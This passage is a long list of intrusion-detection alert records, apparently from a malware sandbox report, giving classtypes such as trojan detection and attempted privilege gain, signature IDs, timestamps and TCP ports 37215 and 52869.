                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.616434
                      SID:2027339
                      Source Port:38648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:35032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2025132
                      Source Port:36342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.798234
                      SID:2831300
                      Source Port:53904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.072641
                      SID:2027339
                      Source Port:50632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.152613
                      SID:2025132
                      Source Port:50726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.601040
                      SID:2831300
                      Source Port:34250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.651026
                      SID:2829579
                      Source Port:52146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.947779
                      SID:2027339
                      Source Port:45322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.299019
                      SID:2025132
                      Source Port:35426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.050672
                      SID:2829579
                      Source Port:41876
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2835222
                      Source Port:35634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.085431
                      SID:2835222
                      Source Port:36238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.108910
                      SID:2025132
                      Source Port:36110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2829579
                      Source Port:50596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039129
                      SID:2829579
                      Source Port:55026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.888686
                      SID:2027339
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:46582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.359091
                      SID:2025132
                      Source Port:35414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.630572
                      SID:2835222
                      Source Port:53720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.812448
                      SID:2025132
                      Source Port:43362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.582295
                      SID:2027339
                      Source Port:54232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.940746
                      SID:2025132
                      Source Port:53548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:10.610618
                      SID:2025132
                      Source Port:39700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.790282
                      SID:2027339
                      Source Port:58736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.463055
                      SID:2027339
                      Source Port:52582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.978142
                      SID:2829579
                      Source Port:51306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633385
                      SID:2829579
                      Source Port:55384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758824
                      SID:2025132
                      Source Port:35010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.399678
                      SID:2831300
                      Source Port:38444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.518588
                      SID:2027339
                      Source Port:55242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:56422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.668802
                      SID:2027339
                      Source Port:38256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2829579
                      Source Port:43684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.526784
                      SID:2831300
                      Source Port:48998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.420081
                      SID:2027339
                      Source Port:33654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:44694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.019540
                      SID:2027339
                      Source Port:44750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.313050
                      SID:2027339
                      Source Port:39142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2829579
                      Source Port:38924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631549
                      SID:2835222
                      Source Port:40492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.702731
                      SID:2027339
                      Source Port:40134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.433035
                      SID:2025132
                      Source Port:54366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2829579
                      Source Port:34334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.010540
                      SID:2027339
                      Source Port:53536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.175900
                      SID:2829579
                      Source Port:48058
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.132906
                      SID:2027339
                      Source Port:41954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.800583
                      SID:2027339
                      Source Port:41092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.761996
                      SID:2027339
                      Source Port:57408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.520663
                      SID:2025132
                      Source Port:50418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.914948
                      SID:2831300
                      Source Port:36136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2835222
                      Source Port:43088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.603963
                      SID:2025132
                      Source Port:33514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.666677
                      SID:2831300
                      Source Port:44326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.004906
                      SID:2835222
                      Source Port:34768
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097135
                      SID:2829579
                      Source Port:36888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221090
                      SID:2829579
                      Source Port:52728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593640
                      SID:2831300
                      Source Port:57606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.092258
                      SID:2831300
                      Source Port:56642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.300735
                      SID:2027339
                      Source Port:38046
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.533289
                      SID:2025132
                      Source Port:43528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.970797
                      SID:2025132
                      Source Port:52042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.614193
                      SID:2831300
                      Source Port:54848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:04.767225
                      SID:2027339
                      Source Port:33734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.967403
                      SID:2027339
                      Source Port:48342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.716157
                      SID:2027339
                      Source Port:56142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.094795
                      SID:2829579
                      Source Port:54082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.631492
                      SID:2027339
                      Source Port:40900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.572503
                      SID:2831300
                      Source Port:46268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.522141
                      SID:2831300
                      Source Port:32980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.866395
                      SID:2025132
                      Source Port:40598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2835222
                      Source Port:35110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044293
                      SID:2835222
                      Source Port:40776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.240033
                      SID:2835222
                      Source Port:58496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043865
                      SID:2829579
                      Source Port:48550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258057
                      SID:2025132
                      Source Port:53762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.019511
                      SID:2027339
                      Source Port:33542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633295
                      SID:2829579
                      Source Port:37926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.092258
                      SID:2027339
                      Source Port:34218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:07.984371
                      SID:2027339
                      Source Port:35942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2835222
                      Source Port:37614
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2835222
                      Source Port:46656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.720668
                      SID:2027339
                      Source Port:36286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.293630
                      SID:2025132
                      Source Port:36548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.559170
                      SID:2831300
                      Source Port:46372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.603553
                      SID:2831300
                      Source Port:60298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.301558
                      SID:2025132
                      Source Port:48106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.725615
                      SID:2027339
                      Source Port:54942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.087294
                      SID:2027339
                      Source Port:41836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.684763
                      SID:2025132
                      Source Port:35248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.655551
                      SID:2829579
                      Source Port:52540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.279669
                      SID:2835222
                      Source Port:60064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.994703
                      SID:2027339
                      Source Port:40006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.689806
                      SID:2025132
                      Source Port:41968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.731228
                      SID:2831300
                      Source Port:35482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.707761
                      SID:2025132
                      Source Port:33544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:14.686790
                      SID:2027339
                      Source Port:55400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2835222
                      Source Port:40608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.045831
                      SID:2835222
                      Source Port:45764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.898615
                      SID:2831300
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2831300
                      Source Port:39588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2835222
                      Source Port:38352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.297644
                      SID:2027339
                      Source Port:33012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221748
                      SID:2835222
                      Source Port:39456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.063023
                      SID:2831300
                      Source Port:51810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.269160
                      SID:2027339
                      Source Port:34702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2829579
                      Source Port:59180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.658614
                      SID:2027339
                      Source Port:59664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.021834
                      SID:2025132
                      Source Port:52308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.322288
                      SID:2027339
                      Source Port:41996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2831300
                      Source Port:32940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2829579
                      Source Port:41862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.520663
                      SID:2831300
                      Source Port:52002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.818567
                      SID:2025132
                      Source Port:60200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221727
                      SID:2829579
                      Source Port:55506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221790
                      SID:2829579
                      Source Port:53842
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.946380
                      SID:2027339
                      Source Port:50156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2835222
                      Source Port:39268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.632121
                      SID:2027339
                      Source Port:57462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.592141
                      SID:2831300
                      Source Port:53584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.799480
                      SID:2027339
                      Source Port:60470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.483452
                      SID:2027339
                      Source Port:42042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.034246
                      SID:2027339
                      Source Port:43210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572196
                      SID:2027339
                      Source Port:50430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.065745
                      SID:2025132
                      Source Port:48512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.775041
                      SID:2027339
                      Source Port:36792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.592479
                      SID:2831300
                      Source Port:53042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.662466
                      SID:2025132
                      Source Port:34206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.426290
                      SID:2831300
                      Source Port:41698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.679677
                      SID:2027339
                      Source Port:47086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2027339
                      Source Port:43106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2835222
                      Source Port:41970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.026812
                      SID:2829579
                      Source Port:47382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.485082
                      SID:2027339
                      Source Port:56676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2829579
                      Source Port:36820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591862
                      SID:2831300
                      Source Port:58820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.096276
                      SID:2831300
                      Source Port:43620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.820979
                      SID:2835222
                      Source Port:42580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.190670
                      SID:2027339
                      Source Port:51900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.632331
                      SID:2025132
                      Source Port:51590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.296756
                      SID:2835222
                      Source Port:45326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.331748
                      SID:2831300
                      Source Port:40186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.596401
                      SID:2027339
                      Source Port:45956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.760964
                      SID:2025132
                      Source Port:39610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.339597
                      SID:2025132
                      Source Port:48770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:39666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.044693
                      SID:2027339
                      Source Port:53134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.049602
                      SID:2829579
                      Source Port:57588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.542563
                      SID:2025132
                      Source Port:60338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.000471
                      SID:2025132
                      Source Port:56196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.974605
                      SID:2027339
                      Source Port:52974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.813695
                      SID:2831300
                      Source Port:54032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.856294
                      SID:2025132
                      Source Port:42986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.331748
                      SID:2027339
                      Source Port:42850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2835222
                      Source Port:57214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.683188
                      SID:2025132
                      Source Port:37380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.102095
                      SID:2025132
                      Source Port:59822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.598095
                      SID:2831300
                      Source Port:47886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.146170
                      SID:2027339
                      Source Port:41844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.759828
                      SID:2025132
                      Source Port:35976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2829579
                      Source Port:42284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.981855
                      SID:2835222
                      Source Port:39198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.813001
                      SID:2025132
                      Source Port:45390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.787786
                      SID:2025132
                      Source Port:38406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2835222
                      Source Port:57116
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.667964
                      SID:2027339
                      Source Port:49882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.580365
                      SID:2831300
                      Source Port:55990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.372532
                      SID:2027339
                      Source Port:57208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.842529
                      SID:2027339
                      Source Port:32888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.848726
                      SID:2027339
                      Source Port:55424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.589759
                      SID:2027339
                      Source Port:59784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.963815
                      SID:2025132
                      Source Port:42802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.021704
                      SID:2831300
                      Source Port:53752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.412594
                      SID:2025132
                      Source Port:37478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.974837
                      SID:2835222
                      Source Port:39248
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2835222
                      Source Port:50594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790680
                      SID:2027339
                      Source Port:40562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591862
                      SID:2027339
                      Source Port:58720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.682135
                      SID:2831300
                      Source Port:42860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.816277
                      SID:2835222
                      Source Port:44124
                      Destination Port:37215
                      Protocol:TCP
